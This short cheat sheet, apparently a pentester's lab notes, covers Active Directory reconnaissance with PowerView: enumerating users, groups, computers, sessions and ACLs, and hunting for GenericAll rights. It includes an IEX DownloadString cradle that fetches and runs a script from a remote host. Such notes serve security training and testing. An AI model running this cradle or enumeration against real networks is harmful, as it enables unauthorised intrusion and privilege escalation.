PowerView

If you have access to an AD client, with user in the Domain.

Import the PowerView into memory.

PS> Import-Module .\PowerView.ps1

Directly in to memory from web service

IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')

User Enumeration

PS> Get-NetUser

PS> Get-NetUser | select samaccountname, lastlogon

# interesting things
logoncount
samaccountname
lastlogon

Group Enumeration

PS> Get-NetGroup
PS> Get-NetGroup "Sales Department" | select member

# check nested group

Computer Enumeration

PS> Get-NetComputer | select dnshostname, operationsystem, operationgsystemversion
PS> Resolve-IPAddress client.corp.com
PS> Get-NetSession -ComputerName client2.corp.com -Verbose

ACL Enumeration

PS> Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"}

# SID enumeration with GenericAll
PS> Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

# Convert SID to name

PS> "<SID 1>","<SID 2>","<SID 3>" |Convert-SidToName